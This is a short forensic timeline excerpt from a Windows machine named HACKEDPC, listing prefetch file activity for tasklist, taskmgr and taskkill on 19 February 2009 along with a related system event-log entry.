02/19/09 15:13:40 accessed TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf
02/19/09 15:13:40 created TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf
02/19/09 15:13:40 written TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf
02/19/09 15:13:40 modified TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf
02/19/09 15:13:40 accessed TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf
02/19/09 15:13:40 created TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf
02/19/09 15:13:40 written TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf
02/19/09 15:13:40 modified TASKLIST.EXE-18943874.pf C:\WINDOWS\Prefetch\TASKLIST.EXE-18943874.pf
02/19/09 15:14:50 accessed TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf
02/19/09 15:14:50 written TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf
02/19/09 15:14:50 modified TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf
02/19/09 15:14:50 accessed TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf
02/19/09 15:14:50 written TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf
02/19/09 15:14:50 modified TASKMGR.EXE-06144C13.pf C:\WINDOWS\Prefetch\TASKMGR.EXE-06144C13.pf
02/19/09 15:16:34 accessed index.dat file:///C:/Program Files/AWS/WeatherBug/Local/center_failed.html History\Daily
02/19/09 15:16:37 logged SysEvent.Evt EVENT ID: 26 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Application popup: taskkill.exe - DLL Initialization Failed : The application failed to initialize because the window station is shutting down.
02/19/09 15:16:37 accessed TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf
02/19/09 15:16:37 written TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf
02/19/09 15:16:37 modified TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf
02/19/09 15:16:37 accessed TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf
02/19/09 15:16:37 written TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf
02/19/09 15:16:37 modified TASKKILL.EXE-1EEA7CB4.pf C:\WINDOWS\Prefetch\TASKKILL.EXE-1EEA7CB4.pf